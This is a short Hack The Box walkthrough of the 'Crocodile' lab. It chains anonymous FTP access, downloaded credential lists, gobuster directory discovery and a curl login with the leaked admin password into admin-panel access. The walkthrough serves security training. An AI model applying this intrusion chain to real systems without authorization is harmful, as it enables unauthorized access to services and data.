HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag
#tutorial#programming#hacktoberfest#ftp
keyfive5 / Obsidian Signal

keyfive5 / Obsidian Signal @keyfive5

About: Cybersecurity Masters

Joined:
Apr 18, 2025

HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag

Publish Date: Apr 21
0 0

Introduction

In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.

You’ll learn to:

  • Enumerate FTP and download leaked credential files
  • Extract valid usernames/passwords
  • Use Gobuster to discover hidden web pages
  • Authenticate to a PHP login panel and capture the flag

Prerequisites

  • Kali Linux (or any distro with ftp, gobuster, curl)
  • HTB VPN connection

1. FTP Enumeration 

nmap -sC -sV -p 21,80 <IP>
ftp <IP>
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd
Enter fullscreen mode Exit fullscreen mode

Inspect the lists:

cat allowed.userlist
cat allowed.userlist.passwd
Enter fullscreen mode Exit fullscreen mode

2. Extract Credentials

From allowed.userlist + .passwd, find a valid pair (e.g. admin / Supersecretpassword1).

3. Discover Hidden Pages 

gobuster dir \
  --url http://<IP>/ \
  --wordlist /usr/share/wordlists/dirb/common.txt \
  -x php,html
Enter fullscreen mode Exit fullscreen mode

Look for /login.php.

4. Admin Login & Flag 

curl -d "username=admin&password=Supersecretpassword1" \
     http://<IP>/login.php
Enter fullscreen mode Exit fullscreen mode

You’ll be redirected to the Admin panel—your flag is displayed at the top.

5. Lessons Learned

  • Anonymous services often leak credentials.
  • Combine leaked creds with web enumeration for full-chain exploits.
  • Automate with scripts in professional engagements.

🔗 Repo & full write‑up: https://github.com/keyfive5/obsidiansignal-htb-crocodile

Comments 0 total

    Add comment